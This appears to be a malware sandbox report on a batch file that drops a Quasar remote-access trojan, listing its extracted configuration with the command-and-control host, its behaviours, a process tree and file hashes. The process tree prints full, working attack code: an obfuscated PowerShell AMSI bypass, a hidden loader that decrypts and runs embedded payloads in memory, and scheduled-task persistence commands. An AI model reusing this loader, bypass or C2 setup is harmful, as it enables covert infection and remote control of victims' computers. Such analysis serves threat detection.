Analysis
-
max time kernel
84s -
max time network
92s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
-
submitted
26-05-2024 19:38
General
-
Target
$77-Built.bat
-
Size
3.5MB
-
MD5
297d7e65305917b5a212ca9f4b4d99d2
-
SHA1
402192fd3b13ea1fd26403e227ceb119e8569b4c
-
SHA256
cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
-
SHA512
6055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
SSDEEP
49152:cYbGAyBfhKnc19015vyfIchfKpcuGj8RmSMvANLFt/X9oS4ot3X3tLdDh:cG
Score
10/10
Malware Config
Extracted
Family
quasar
Attributes
-
reconnect_delay
3000
Extracted
Family
quasar
Version
1.4.1
Botnet
Rootkit
C2
uk2.localto.net:3444
Mutex
13b8023a-5596-4efa-b088-c87d2ca4e84f
Attributes
-
encryption_key
6BE0D74806BB58E6DB21FA6E3B6DB38B4A72BAFC
-
install_name
$77-powershell.exe
-
log_directory
$77-Logs
-
reconnect_delay
3000
-
startup_key
Discord
-
subdirectory
$77-Rootkit
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 4 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 4 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 4 IoCs
-
Suspicious use of SendNotifyMessage 4 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3d0e1e1b-373a-41dd-8190-56b351c2d29f}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uIvxZJgMzRFV{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MXwaypawbVpDpJ,[Parameter(Position=1)][Type]$caNhasgXfq)$KwbzrUESPiA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+''+[Char](102)+'l'+'e'+''+[Char](99)+''+[Char](116)+'e'+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'Mo'+[Char](100)+'u'+[Char](108)+'e',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'el'+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+'l'+[Char](97)+'s'+[Char](115)+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+'a'+''+'l'+''+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'A'+''+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$KwbzrUESPiA.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'bl'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$MXwaypawbVpDpJ).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+''+'a'+'nage'+'d'+'');$KwbzrUESPiA.DefineMethod('I'+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+'e'+'B'+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+','+'N'+''+[Char](101)+''+'w'+''+'S'+''+[Char](108)+''+'o'+'t'+','+''+[Char](86)+'i'+'r'+'t'+'u'+''+[Char](97)+''+[Char](108)+'',$caNhasgXfq,$MXwaypawbVpDpJ).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+','+'Mana'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $KwbzrUESPiA.CreateType();}$zXWEPPVhltgoN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+'t'+'.'+''+[Char](87)+''+'i'+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+'e'+''+'N'+''+[Char](97)+''+[Char](116)+''+[Char](105)+'ve'+[Char](77)+''+'e'+'t'+'h'+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$mbfNlwcrfCyGlW=$zXWEPPVhltgoN.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'l'+'i'+'c'+[Char](44)+'S'+[Char](116)+''+'a'+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$rtgfsHTYUmKiWdpJilb=uIvxZJgMzRFV @([String])([IntPtr]);$nmTXiHraRxyuNrsxHygMxo=uIvxZJgMzRFV @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KJXtXOjvOOj=$zXWEPPVhltgoN.GetMethod('G'+'e'+''+'t'+''+[Char](77)+''+'o'+'d'+'u'+''+[Char](108)+''+[Char](101)+''+'H'+'an'+'d'+''+'l'+'e').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+'.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$KipVnQpQOYKyLG=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$KJXtXOjvOOj,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+'b'+[Char](114)+'a'+[Char](114)+''+'y'+'A')));$cEMOwqEkWnRqgIEje=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$KJXtXOjvOOj,[Object]('Vi'+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+'e'+[Char](99)+'t')));$TdgMYXu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KipVnQpQOYKyLG,$rtgfsHTYUmKiWdpJilb).Invoke(''+'a'+''+[Char](109)+''+'s'+''+'i'+''+'.'+''+'d'+''+[Char](108)+'l');$nwXnGwTDdBlftMyts=$mbfNlwcrfCyGlW.Invoke($Null,@([Object]$TdgMYXu,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+[Char](99)+'an'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$HqnVkxuGKl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cEMOwqEkWnRqgIEje,$nmTXiHraRxyuNrsxHygMxo).Invoke($nwXnGwTDdBlftMyts,[uint32]8,4,[ref]$HqnVkxuGKl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nwXnGwTDdBlftMyts,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cEMOwqEkWnRqgIEje,$nmTXiHraRxyuNrsxHygMxo).Invoke($nwXnGwTDdBlftMyts,[uint32]8,0x20,[ref]$HqnVkxuGKl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+'7s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77-Built.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77-Built.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77-Built.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_228_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_228.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_228.vbs"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_228.bat" "5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_228.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_228.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exeFilesize
3.1MB
MD54de93a204d54204a0798175c8457a2de
SHA138abe30fa70c599846e0b777d4ee62422781837f
SHA2567333499e805ad534c6f65623adf4600c0484830cefa08c0a75f98b46a929fefb
SHA512e3ae4e2c84dec014dd15bc29faa9767214972eef8bdee9db063f4fbe059549212f17c69f06a78a12880f53a766e357c73eae6763f2452fb4eff2302f5396304a
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lovzdlng.f0x.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\AppData\Roaming\startup_str_228.batFilesize
3.5MB
MD5297d7e65305917b5a212ca9f4b4d99d2
SHA1402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA5126055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
C:\Users\Admin\AppData\Roaming\startup_str_228.vbsFilesize
115B
MD5a3eff77a8bb96c7ea21bade46304b184
SHA117d8dc720fe37f86b78b2983e742d826bbdadd04
SHA256b716dbc43ab756db989f684a616834181fe3ca71a848933349fa1e4a0b447515
SHA512ed4625deb3fab7a532418ed9f0189fb109eb92e66e6169b05133e991607bbc4469cb3558c745549b4a2d09c2290b09f310d1bf9efdc2c553de05b4105924a2c7
-
memory/480-141-0x0000021D6D910000-0x0000021D6D93A000-memory.dmpFilesize
168KB
-
memory/480-146-0x0000021D6D910000-0x0000021D6D93A000-memory.dmpFilesize
168KB
-
memory/480-147-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/636-111-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/636-116-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/636-117-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/636-109-0x000002504D310000-0x000002504D335000-memory.dmpFilesize
148KB
-
memory/636-110-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/688-127-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/688-121-0x00000199FDA50000-0x00000199FDA7A000-memory.dmpFilesize
168KB
-
memory/688-126-0x00000199FDA50000-0x00000199FDA7A000-memory.dmpFilesize
168KB
-
memory/708-157-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/708-151-0x0000016797B20000-0x0000016797B4A000-memory.dmpFilesize
168KB
-
